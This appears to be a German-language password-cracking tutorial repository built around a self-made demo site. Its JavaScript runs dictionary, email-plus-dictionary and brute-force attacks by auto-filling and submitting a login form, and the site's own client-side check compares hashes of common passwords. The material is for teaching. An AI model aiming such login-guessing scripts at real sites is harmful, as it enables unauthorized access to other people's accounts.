"liverpool", "iloveyou1", "michelle", 101010, 1234561, "hello", "andrew", "a123456789", "a12345", "Status", "fuckyou1", "1qaz2wsx3edc", "hunter", "princess1", "naruto", "justin", "jennifer", "qwerty12", "qweasd", "anthony", "andrea", "joshua", "asdf1234", "12345qwert", "1qazxsw2", "marina", "love123", 111222, "robert", 10203, "nicole", "letmein", "football1", "secret", 1234554321, "freedom", "michael1", 11223344, "qqqqqq", 123654789, "chocolate", "12345q", "internet", "q1w2e3", "google", "starwars", "mynoob", "qwertyui", 55555, "qwertyu", "lol123", "lovely", "monkey1", "nikita", "pakistan", 7758521, 87654321, 147852, "jordan23", 212121, 123789, 147852369, "123456789q", "qwe", "forever", 741852963, "123qweasd", "123456abc", "1q2w3e4r5t6y", "qazxsw", 456789, 232323, 999999999, "qwerty12345", "qwaszx", 1234567891, 456123, 444444, "qq123456", "xxx"]; 2 | let emails = [ 3 | 'albert.einstein@hacker-email.com', 4 | 'grace.hopper@hacker-email.com', 5 | 'marie.curie@hacker-email.com', 6 | 'konrad.zuse@hacker-email.com', 7 | 'stephanie-kwolek@hacker-email.com', 8 | 'carl-friedrich.auss@hacker-email.com', 9 | 'shirley-ann.jackson@hacker-email.com', 10 | 'gertrude-belle.elion@hacker-email.com', 11 | 'steve.wozniak@hacker-email.com', 12 | 'rudolf.bayer@hacker-email.com', 13 | 'ada.lovelace@hacker-email.com' 14 | ]; 15 | 16 | let index = 0; 17 | 18 | 19 | function dictionaryAttack() { 20 | let currentPassword = dictionary[index]; 21 | console.log('Testing password', currentPassword); 22 | index++; 23 | password.type = 'text'; 24 | password.value = currentPassword; 25 | loginButton.click(); 26 | if (index < dictionary.length) { 27 | setTimeout(dictionaryAttack, 500); 28 | } 29 | } 30 | 31 | 32 | 33 | 34 | 35 | 36 | function emailDictionaryAttack(i, j) { // i = 0; j = 0 37 | console.log('Testing', emails[i], dictionary[j]); 38 | password.type = 'text'; 39 | username.value = emails[i]; 40 | password.value = dictionary[j]; 41 | loginButton.click(); 42 | 43 | j++; 44 | 45 | if (j >= dictionary.length) { 46 | i++; 47 | j = 0; 48 | } 49 | 50 | if (i < emails.length || j < dictionary.length) { 51 | setTimeout(emailDictionaryAttack, 20, i, j); 52 | } 53 | } 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | let alphabet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"]; 63 | 64 | 65 | function bruteForceAttack(length) { 66 | let combinations = []; 67 | 68 | for (let i = 0; i <= length; i++) { 69 | let newSets = combineArrays(Array.from(Array(i)).map(a => alphabet)); 70 | combinations = [...combinations, ...newSets]; 71 | } 72 | console.log(combinations); 73 | 74 | tryCombinations(combinations) 75 | } 76 | 77 | function tryCombinations(combinations) { 78 | console.log('Trying Password', combinations[index]); 79 | password.type = 'text'; 80 | password.value = combinations[index]; 81 | loginButton.click(); 82 | index++; 83 | if (index < combinations.length) { 84 | setTimeout(tryCombinations, 500, combinations); 85 | } 86 | } 87 | 88 | 89 | function combineArrays(array_of_arrays) { 90 | 91 | // First, handle some degenerate cases... 92 | 93 | if (!array_of_arrays) { 94 | // Or maybe we should toss an exception...? 95 | return []; 96 | } 97 | 98 | if (!Array.isArray(array_of_arrays)) { 99 | // Or maybe we should toss an exception...? 100 | return []; 101 | } 102 | 103 | if (array_of_arrays.length == 0) { 104 | return []; 105 | } 106 | 107 | for (let i = 0; i < array_of_arrays.length; i++) { 108 | if (!Array.isArray(array_of_arrays[i]) || array_of_arrays[i].length == 0) { 109 | // If any of the arrays in array_of_arrays are not arrays or zero-length, return an empty array... 110 | return []; 111 | } 112 | } 113 | 114 | // Done with degenerate cases... 115 | 116 | // Start "odometer" with a 0 for each array in array_of_arrays. 117 | let odometer = new Array(array_of_arrays.length); 118 | odometer.fill(0); 119 | 120 | let output = []; 121 | 122 | let newCombination = formCombination(odometer, array_of_arrays); 123 | 124 | output.push(newCombination); 125 | 126 | while (odometer_increment(odometer, array_of_arrays)) { 127 | newCombination = formCombination(odometer, array_of_arrays); 128 | output.push(newCombination); 129 | } 130 | 131 | return output; 132 | } 133 | 134 | // Translate "odometer" to combinations from array_of_arrays 135 | function formCombination(odometer, array_of_arrays) { 136 | // In Imperative Programmingese (i.e., English): 137 | // let s_output = ""; 138 | // for( let i=0; i < odometer.length; i++ ){ 139 | // s_output += "" + array_of_arrays[i][odometer[i]]; 140 | // } 141 | // return s_output; 142 | 143 | // In Functional Programmingese (Henny Youngman one-liner): 144 | return odometer.reduce( 145 | function(accumulator, odometer_value, odometer_index) { 146 | return "" + accumulator + array_of_arrays[odometer_index][odometer_value]; 147 | }, 148 | "" 149 | ); 150 | } /* formCombination() */ 151 | 152 | function odometer_increment(odometer, array_of_arrays) { 153 | 154 | // Basically, work you way from the rightmost digit of the "odometer"... 155 | // if you're able to increment without cycling that digit back to zero, 156 | // you're all done, otherwise, cycle that digit to zero and go one digit to the 157 | // left, and begin again until you're able to increment a digit 158 | // without cycling it...simple, huh...? 159 | 160 | for (let i_odometer_digit = odometer.length - 1; i_odometer_digit >= 0; i_odometer_digit--) { 161 | 162 | let maxee = array_of_arrays[i_odometer_digit].length - 1; 163 | 164 | if (odometer[i_odometer_digit] + 1 <= maxee) { 165 | // increment, and you're done... 166 | odometer[i_odometer_digit]++; 167 | return true; 168 | } else { 169 | if (i_odometer_digit - 1 < 0) { 170 | // No more digits left to increment, end of the line... 171 | return false; 172 | } else { 173 | // Can't increment this digit, cycle it to zero and continue 174 | // the loop to go over to the next digit... 175 | odometer[i_odometer_digit] = 0; 176 | continue; 177 | } 178 | } 179 | } /* for( let odometer_digit = odometer.length-1; odometer_digit >=0; odometer_digit-- ) */ 180 | 181 | } /* odometer_increment() */ -------------------------------------------------------------------------------- /readme.MD: -------------------------------------------------------------------------------- 1 | # IT Security Tutorial 2 | Hier lernst du, wie Hacker Passwörter knacken. Dabei geht es nicht nur um Theorie-Wissen. Wir entwickeln in dem zugehörigen Youtube-Video gemeinsam ein Script, mit welchem wir eine selbst erstellte Seite hacken werden. 3 | 4 | 5 | ## Funktion zum ausprobieren 6 | ``` 7 | let index = 1; 8 | function tryCombinations(combinations) { 9 | console.log('Trying Password', combinations[index]); 10 | password.type = 'text'; 11 | password.value = combinations[index]; 12 | loginButton.click(); 13 | index++; 14 | if (index < combinations.length) { 15 | setTimeout(tryCombinations, 500, combinations); 16 | } 17 | } 18 | ``` 19 | 20 | 21 | ## Passwörter 22 | ``` 23 | let dictionary = [123456, 123456789, 12345, "qwerty", "password", 12345678, 111111, 123123, 1234567890, 1234567, "qwerty123", "000000", "1q2w3e", "aa12345678", "abc123", "password1", 1234, "qwertyuiop", 123321, "password123", "1q2w3e4r5t", "iloveyou", 654321, 666666, 987654321, 123, "123456a", "qwe123", "1q2w3e4r", 7777777, "1qaz2wsx", "123qwe", "zxcvbnm", 121212, "asdasd", "a123456", 555555, "dragon", 112233, 123123123, "monkey", 11111111, "qazwsx", 159753, "asdfghjkl", 222222, "1234qwer", "qwerty1", 123654, "123abc", "asdfgh", 777777, "aaaaaa", "myspace1", 88888888, "fuckyou", "123456789a", 999999, 888888, "football", "princess", 789456123, 147258369, 1111111, "sunshine", "michael", "computer", "qwer1234", "daniel", 789456, 11111, "abcd1234", "q1w2e3r4", "shadow", 159357, "123456q", 1111, "samsung", "killer", "asd123", "superman", "master", "12345a", "azerty", "zxcvbn", "qazwsxedc", 131313, "ashley", "target123", 987654, "baseball", "qwert", "asdasd123", "qwerty", "soccer", "charlie", "qweasdzxc", "tinkle", "jessica", "q1w2e3r4t5", "asdf", "test1", "1g2w3e4r", "gwerty123", "zag12wsx", "gwerty", 147258, 12341234, "qweqwe", "jordan", "pokemon", "q1w2e3r4t5y6", 12345678910, 1111111111, 12344321, "thomas", "love", "12qwaszx", 102030, "welcome", "liverpool", "iloveyou1", "michelle", 101010, 1234561, "hello", "andrew", "a123456789", "a12345", "Status", "fuckyou1", "1qaz2wsx3edc", "hunter", "princess1", "naruto", "justin", "jennifer", "qwerty12", "qweasd", "anthony", "andrea", "joshua", "asdf1234", "12345qwert", "1qazxsw2", "marina", "love123", 111222, "robert", 10203, "nicole", "letmein", "football1", "secret", 1234554321, "freedom", "michael1", 11223344, "qqqqqq", 123654789, "chocolate", "12345q", "internet", "q1w2e3", "google", "starwars", "mynoob", "qwertyui", 55555, "qwertyu", "lol123", "lovely", "monkey1", "nikita", "pakistan", 7758521, 87654321, 147852, "jordan23", 212121, 123789, 147852369, "123456789q", "qwe", "forever", 741852963, "123qweasd", "123456abc", "1q2w3e4r5t6y", "qazxsw", 456789, 232323, 999999999, "qwerty12345", "qwaszx", 1234567891, 456123, 444444, "qq123456", "xxx"]; 24 | ``` 25 | 26 | ## E-Mail Liste 27 | ``` 28 | let emails = [ 29 | 'albert.einstein@hacker-email.com', 30 | 'grace.hopper@hacker-email.com', 31 | 'marie.curie@hacker-email.com', 32 | 'konrad.zuse@hacker-email.com', 33 | 'stephanie-kwolek@hacker-email.com', 34 | 'carl-friedrich.gauss@hacker-email.com', 35 | 'shirley-ann.jackson@hacker-email.com', 36 | 'gertrude-belle.elion@hacker-email.com', 37 | 'steve.wozniak@hacker-email.com', 38 | 'rudolf.bayer@hacker-email.com', 39 | 'ada.lovelace@hacker-email.com' 40 | ]; 41 | ``` 42 | 43 | ## Dictionary mit E-Mail 44 | ``` 45 | function emailDictionaryAttack(i, j) { // i = 0; j = 0 46 | console.log('Testing', emails[i], dictionary[j]); 47 | password.type = 'text'; 48 | username.value = emails[i]; 49 | password.value = dictionary[j]; 50 | loginButton.click(); 51 | 52 | j++; 53 | 54 | if (j >= dictionary.length) { 55 | i++; 56 | j = 0; 57 | } 58 | 59 | if (i < emails.length || j < dictionary.length) { 60 | setTimeout(emailDictionaryAttack, 20, i, j); 61 | } 62 | } 63 | ``` -------------------------------------------------------------------------------- /script.js: -------------------------------------------------------------------------------- 1 | window.onload = function() { 2 | includeHTML(); 3 | }; 4 | 5 | let shoppingCart = []; 6 | 7 | window.onscroll = function() { 8 | let shoppingCartContainer = document.getElementById('shoppingCartContainer'); 9 | console.log(window.scrollY); 10 | if (window.scrollY < 128) { 11 | shoppingCartContainer.style.top = (128 - window.scrollY) + 'px'; 12 | } else { 13 | shoppingCartContainer.style.top = '0px'; 14 | } 15 | }; 16 | 17 | function checkPassword(password) { 18 | const pwdenc = ['15e2b0d3c33891ebb0f1ef609ec419420c20e320ce94c65fbc8c3312448eb225', '5994471abb01112afcc18159f6cc74b4f511b99806da59b3caf5a9c173cacfc5', '65e84be33532fb784c48129675f9eff3a682b27168c0ea744b2cf58ee02337c5', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'ef797c8118f02dfb649607dd5d3f8c7623048c9c063d532cc95c5ed7a898a64f', 'bcb15f821479b4d5772bd0ca866c00ad5f926e3580720659cc80d39c9d09802a', '96cae35ce8a9b0244178bf28e4966c2ce1b8385723a96a6b838858cdd6ca0a1e', 'c775e7b757ede630cd0aa1113bd102661ab38829ca52a6422ab782862f268646', '8bb0cf6eb9b17d0f7d22b456f121257dc1254e1f01665370476383ea776df414', 'daaad6e5604e8e17bd9f108d91e26afe6281dac8fda0091040a7a6d7bd9b43b5', '91b4d142823f7d20c5f08df69122de43f35f057a988d9619f6d3138485c9a203', 'c0c4a69b17a7955ac230bfc8db4a123eaa956ccf3c0022e68b8d4e2f5b699d1f', 'e69fc66a299ad7fd3303c1480f5f51f94b09a2a25a7dbd42221cfa8ed4c5baca', '6ca13d52ca70c883e0f0bb101e425a89e8624de51db2d2392593af6a84118090', '0b14d501a594442a01c6859541bcb3e8164d183d32937b851835442f69d5c94e', '03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4', '9a900403ac313ba27a1bc81f0932652b8020dac92c234d98fa0b06bf0040ecfd', 'a320480f534776bddb5cdb54b1e93d210a3c7d199e80a23c1b2178497b184c76', 'ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f', '28f0116ef42bf718324946f13d787a1d41274a08335d52ee833d5b577f02a32a', 'e4ad93ca07acb8d908a3aa41e920ea4f4ef4f26e7f86cf8291c5db289780a5ae', '481f6cc0511143ccdd7e2d1b1b94faf0a700a8b49cd13922a70b5ae28acaa8c5', '94edf28c6d6da38fd35d7ad53e485307f89fbeaf120485c8d17a43f323deee71', '8a9bcf1e51e812d0af8465a8dbcc9f741064bf0af3b3d08e6b0246437c19f7fb', 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3', 'f707fdda7c874ff49ebfb2c88a2860c5ff4ce3d94a21efb76566ad0f92c9ad57', '18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63', '72ab994fa2eb426c051ef59cad617750bfe06d7cf6311285ff79c19c32afd236', '8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92', '8c1cdb9cb4dbac6dbb6ebd118ec8f9523d22e4e4cb8cc9df5f7e1e499bba3c10']; 19 | return sha256(password) == pwdenc[new Date().getDate()]; 20 | } 21 | 22 | 23 | function checkPassword2(password) { 24 | const pwdenc = ['5994471abb01112afcc18159f6cc74b4f511b99806da59b3caf5a9c173cacfc5', '65e84be33532fb784c48129675f9eff3a682b27168c0ea744b2cf58ee02337c5', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'ef797c8118f02dfb649607dd5d3f8c7623048c9c063d532cc95c5ed7a898a64f', 'bcb15f821479b4d5772bd0ca866c00ad5f926e3580720659cc80d39c9d09802a', '96cae35ce8a9b0244178bf28e4966c2ce1b8385723a96a6b838858cdd6ca0a1e', 'c775e7b757ede630cd0aa1113bd102661ab38829ca52a6422ab782862f268646', '8bb0cf6eb9b17d0f7d22b456f121257dc1254e1f01665370476383ea776df414', 'daaad6e5604e8e17bd9f108d91e26afe6281dac8fda0091040a7a6d7bd9b43b5', '91b4d142823f7d20c5f08df69122de43f35f057a988d9619f6d3138485c9a203', 'c0c4a69b17a7955ac230bfc8db4a123eaa956ccf3c0022e68b8d4e2f5b699d1f', 'e69fc66a299ad7fd3303c1480f5f51f94b09a2a25a7dbd42221cfa8ed4c5baca', '6ca13d52ca70c883e0f0bb101e425a89e8624de51db2d2392593af6a84118090', '0b14d501a594442a01c6859541bcb3e8164d183d32937b851835442f69d5c94e', '03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4', '9a900403ac313ba27a1bc81f0932652b8020dac92c234d98fa0b06bf0040ecfd', 'a320480f534776bddb5cdb54b1e93d210a3c7d199e80a23c1b2178497b184c76', 'ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f', '28f0116ef42bf718324946f13d787a1d41274a08335d52ee833d5b577f02a32a', 'e4ad93ca07acb8d908a3aa41e920ea4f4ef4f26e7f86cf8291c5db289780a5ae', '481f6cc0511143ccdd7e2d1b1b94faf0a700a8b49cd13922a70b5ae28acaa8c5', '94edf28c6d6da38fd35d7ad53e485307f89fbeaf120485c8d17a43f323deee71', '8a9bcf1e51e812d0af8465a8dbcc9f741064bf0af3b3d08e6b0246437c19f7fb', 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3', 'f707fdda7c874ff49ebfb2c88a2860c5ff4ce3d94a21efb76566ad0f92c9ad57', '18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63', '72ab994fa2eb426c051ef59cad617750bfe06d7cf6311285ff79c19c32afd236', '8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92', '8c1cdb9cb4dbac6dbb6ebd118ec8f9523d22e4e4cb8cc9df5f7e1e499bba3c10', '15e2b0d3c33891ebb0f1ef609ec419420c20e320ce94c65fbc8c3312448eb225']; 25 | return sha256(password) == pwdenc[new Date().getDate()]; 26 | } 27 | 28 | function loginWithPassword() { 29 | let password = document.getElementById('password').value; 30 | if (checkPassword(password)) { 31 | window.location.href = './login-success.html'; 32 | } 33 | 34 | } 35 | 36 | function login() { 37 | let username = document.getElementById('username').value; 38 | let password = document.getElementById('password').value; 39 | 40 | if (username == 'marie.curie@hacker-email.com' && checkPassword2(password)) { 41 | window.location.href = './login-success.html'; 42 | } 43 | 44 | } 45 | 46 | 47 | function includeHTML() { 48 | var z, i, elmnt, file, xhttp; 49 | /* Loop through a collection of all HTML elements: */ 50 | z = document.getElementsByTagName("*"); 51 | for (i = 0; i < z.length; i++) { 52 | elmnt = z[i]; 53 | /*search for elements with a certain atrribute:*/ 54 | file = elmnt.getAttribute("w3-include-html"); 55 | if (file) { 56 | /* Make an HTTP request using the attribute value as the file name: */ 57 | xhttp = new XMLHttpRequest(); 58 | xhttp.onreadystatechange = function() { 59 | if (this.readyState == 4) { 60 | if (this.status == 200) { elmnt.innerHTML = this.responseText; } 61 | if (this.status == 404) { elmnt.innerHTML = "Page not found."; } 62 | /* Remove the attribute, and call this function once more: */ 63 | elmnt.removeAttribute("w3-include-html"); 64 | includeHTML(); 65 | } 66 | } 67 | xhttp.open("GET", file, true); 68 | xhttp.send(); 69 | /* Exit the function: */ 70 | return; 71 | } 72 | } 73 | } 74 | 75 | 76 | function encrypt(value) { 77 | var result = ""; 78 | for (i = 0; i < value.length; i++) { 79 | if (i < value.length - 1) { 80 | result += value.charCodeAt(i) + 10; 81 | result += "-"; 82 | } else { 83 | result += value.charCodeAt(i) + 10; 84 | } 85 | } 86 | return result; 87 | } 88 | 89 | function decrypt(value) { 90 | var result = ""; 91 | var array = value.split("-"); 92 | 93 | for (i = 0; i < array.length; i++) { 94 | result += String.fromCharCode(array[i] - 10); 95 | } 96 | return result; 97 | } 98 | 99 | //Google Tag Manager --> 100 | (function(w, d, s, l, i) { 101 | w[l] = w[l] || []; 102 | w[l].push({ 103 | 'gtm.start': new Date().getTime(), 104 | event: 'gtm.js' 105 | }); 106 | var f = d.getElementsByTagName(s)[0], 107 | j = d.createElement(s), 108 | dl = l != 'dataLayer' ? '&l=' + l : ''; 109 | j.async = true; 110 | j.src = 111 | 'https://www.googletagmanager.com/gtm.js?id=' + i + dl; 112 | f.parentNode.insertBefore(j, f); 113 | })(window, document, 'script', 'dataLayer', 'GTM-MLQNJ4P'); 114 | //End Google Tag Manager --> -------------------------------------------------------------------------------- /secret-article.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 |
18 |
19 |
20 | 21 |

Bitte gebe das Passwort ein, um diesen Artikel anzuzeigen. Dieses Mal mache ich es dir nicht so einfach! :)

22 | 23 | 24 | 25 |
26 |
27 | 28 |
29 | 30 |
31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /style.css: -------------------------------------------------------------------------------- 1 | @import url('https://fonts.googleapis.com/css2?family=Newsreader:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700;1,800&display=swap'); 2 | body { 3 | margin: 0; 4 | font-family: 'Newsreader', serif; 5 | background-color: rgba(0, 0, 0, 0.1); 6 | display: flex; 7 | flex-direction: column; 8 | min-height: 100vh; 9 | } 10 | 11 | a { 12 | color: rgba(0, 0, 0, 0.8); 13 | text-decoration: none; 14 | } 15 | 16 | a:hover { 17 | color: rgba(0, 0, 0, 0.4); 18 | } 19 | 20 | p { 21 | color: rgba(0, 0, 0, 0.8); 22 | } 23 | 24 | header { 25 | background-color: orangered; 26 | padding: 20px 50px; 27 | color: white; 28 | font-size: 32px; 29 | font-weight: 500; 30 | display: flex; 31 | align-items: center; 32 | justify-content: space-between; 33 | } 34 | 35 | header a { 36 | color: white; 37 | } 38 | 39 | header a:hover { 40 | color: rgba(255, 255, 255, 0.8); 41 | } 42 | 43 | footer { 44 | padding: 20px 50px; 45 | margin-top: 100px; 46 | background-color: #192D35; 47 | color: white; 48 | } 49 | 50 | footer a { 51 | color: white; 52 | margin: 0px 20px; 53 | } 54 | 55 | footer a:hover { 56 | color: rgba(255, 255, 255, 0.6); 57 | } 58 | 59 | footer .legal-links { 60 | margin-top: 20px; 61 | } 62 | 63 | .shopping-item { 64 | padding: 20px; 65 | border: 1px solid rgba(0, 0, 0, 0.1); 66 | margin: 20px; 67 | display: block; 68 | position: relative; 69 | cursor: pointer; 70 | } 71 | 72 | .shopping-item::after { 73 | position: absolute; 74 | right: 0; 75 | top: 0; 76 | height: 50px; 77 | width: 50px; 78 | content: '+'; 79 | font-size: 32px; 80 | border-left: 1px solid rgba(0, 0, 0, 0.1); 81 | border-bottom: 1px solid rgba(0, 0, 0, 0.1); 82 | display: flex; 83 | justify-content: center; 84 | align-items: center; 85 | } 86 | 87 | .shopping-item:hover { 88 | background-color: rgba(0, 0, 0, 0.05); 89 | color: black; 90 | } 91 | 92 | .shopping-item:hover::after { 93 | background-color: rgba(0, 0, 0, 0.1); 94 | } 95 | 96 | .space-between { 97 | display: flex; 98 | justify-content: space-between; 99 | } 100 | 101 | .mb-8 { 102 | margin-bottom: 8px; 103 | } 104 | 105 | .mt-8 { 106 | margin-top: 8px; 107 | } 108 | 109 | .center { 110 | display: flex; 111 | flex: 1; 112 | justify-content: center; 113 | } 114 | 115 | .quicklinks { 116 | background-color: white; 117 | padding: 20px 50px; 118 | overflow: auto; 119 | } 120 | 121 | .quicklinks a { 122 | color: rgba(0, 0, 0, 0.4); 123 | font-weight: 500; 124 | margin-right: 32px; 125 | } 126 | 127 | .quicklinks a:hover { 128 | color: rgba(0, 0, 0, 0.6); 129 | } 130 | 131 | .button { 132 | color: orangered; 133 | background-color: white; 134 | padding: 8px 16px; 135 | text-decoration: none; 136 | font-size: 16px; 137 | display: flex; 138 | align-items: center; 139 | font-weight: 600; 140 | border-radius: 2px; 141 | cursor: pointer; 142 | box-shadow: 2px 0px 8px rgba(0, 0, 0, 0.2); 143 | border: unset 144 | } 145 | 146 | .button:hover { 147 | background-color: rgb(226, 223, 223); 148 | } 149 | 150 | .article { 151 | background-color: white; 152 | } 153 | 154 | .article-regular { 155 | border-top: 1px dotted rgba(0, 0, 0, 0.1); 156 | min-height: 10px; 157 | margin-top: 0 !important; 158 | } 159 | 160 | .article img { 161 | width: 100%; 162 | height: 120px; 163 | object-fit: cover; 164 | } 165 | 166 | h2 { 167 | margin-block-start: 0; 168 | margin-block-end: 0; 169 | } 170 | 171 | .overlay { 172 | background-color: rgba(0, 0, 0, 0.6); 173 | position: fixed; 174 | top: 0; 175 | bottom: 0px; 176 | left: 0; 177 | right: 0; 178 | display: flex; 179 | justify-content: center; 180 | align-items: center; 181 | flex-direction: column; 182 | } 183 | 184 | .card { 185 | width: 60%; 186 | height: 60%; 187 | background-color: white; 188 | border-radius: 4px; 189 | display: flex; 190 | flex-direction: column; 191 | padding-bottom: 100px; 192 | } 193 | 194 | .card p { 195 | margin-top: 100px; 196 | } 197 | 198 | form { 199 | display: flex; 200 | flex-direction: column; 201 | margin-top: 100px; 202 | } 203 | 204 | form button { 205 | margin-left: 0 !important; 206 | } 207 | 208 | .login { 209 | margin-top: 50px; 210 | } 211 | 212 | input { 213 | margin-bottom: 20px; 214 | height: 48px; 215 | border-radius: 4px; 216 | border: 1px solid rgba(0, 0, 0, 0.1); 217 | padding: 0px 10px; 218 | } 219 | 220 | .shoppingCart { 221 | background-color: white; 222 | padding: 20px; 223 | min-height: 30vh; 224 | position: fixed; 225 | right: 0px; 226 | top: 128px; 227 | height: calc(100vh - 168px); 228 | width: 20%; 229 | box-shadow: -3px 16px 11px rgb(0 0 0 / 10%); 230 | } 231 | 232 | .blurred { 233 | filter: blur(3px); 234 | -webkit-touch-callout: none; 235 | /* iOS Safari */ 236 | -webkit-user-select: none; 237 | /* Safari */ 238 | -khtml-user-select: none; 239 | /* Konqueror HTML */ 240 | -moz-user-select: none; 241 | /* Old versions of Firefox */ 242 | -ms-user-select: none; 243 | /* Internet Explorer/Edge */ 244 | user-select: none; 245 | /* Non-prefixed version, currently 246 | supported by Chrome, Edge, Opera and Firefox */ 247 | } 248 | 249 | .card-content { 250 | text-align: center; 251 | padding: 32px 16px; 252 | flex: 1; 253 | } 254 | 255 | .card-buttons { 256 | display: flex; 257 | justify-content: center; 258 | padding: 32px 16px; 259 | display: flex; 260 | } 261 | 262 | .button-orange { 263 | background-color: orangered; 264 | color: white; 265 | margin: 0px 16px; 266 | width: 100px; 267 | display: flex; 268 | justify-content: center; 269 | } 270 | 271 | .button-orange:hover { 272 | background-color: rgb(247, 109, 59); 273 | } 274 | 275 | .button-orange[disabled] { 276 | background-color: rgba(161, 155, 153, 0.657); 277 | } 278 | 279 | .pretitle { 280 | color: orangered; 281 | font-weight: 600; 282 | font-size: 20px; 283 | margin-top: 10px; 284 | margin-bottom: 10px; 285 | } 286 | 287 | .read-more { 288 | display: flex; 289 | justify-content: flex-end; 290 | margin-bottom: 16px; 291 | } 292 | 293 | .shopping-button-mobile { 294 | display: none; 295 | } 296 | 297 | @media (min-width: 800px) { 298 | .article { 299 | width: 70%; 300 | margin-left: 50px; 301 | margin-top: 50px; 302 | } 303 | h2, 304 | .pretitle, 305 | .read-more, 306 | form, 307 | p { 308 | padding: 0px 20px; 309 | } 310 | } 311 | 312 | @media (max-width: 800px) { 313 | header { 314 | font-size: 24px; 315 | padding: 20px 20px; 316 | } 317 | .quicklinks { 318 | padding: 20px 20px; 319 | } 320 | h2, 321 | .pretitle, 322 | .read-more, 323 | form, 324 | p { 325 | padding: 0px 20px; 326 | } 327 | .card { 328 | width: 100%; 329 | height: 100%; 330 | border-radius: 0px; 331 | } 332 | .hide-mobile { 333 | display: none; 334 | } 335 | .shopping-button-mobile { 336 | display: flex !important; 337 | position: fixed; 338 | left: 0; 339 | right: 0; 340 | width: 100vw; 341 | margin-left: 0; 342 | margin-right: 0; 343 | height: 80px; 344 | bottom: 0; 345 | } 346 | } -------------------------------------------------------------------------------- /templates/footer.html: -------------------------------------------------------------------------------- 1 | 11 | 12 | 14 | -------------------------------------------------------------------------------- /templates/header.html: -------------------------------------------------------------------------------- 1 |
2 | Hacker Area 3 | 4 | Login 5 |
6 | 7 |
8 | Einfacher Login 9 | Login mit E-Mail 10 |
--------------------------------------------------------------------------------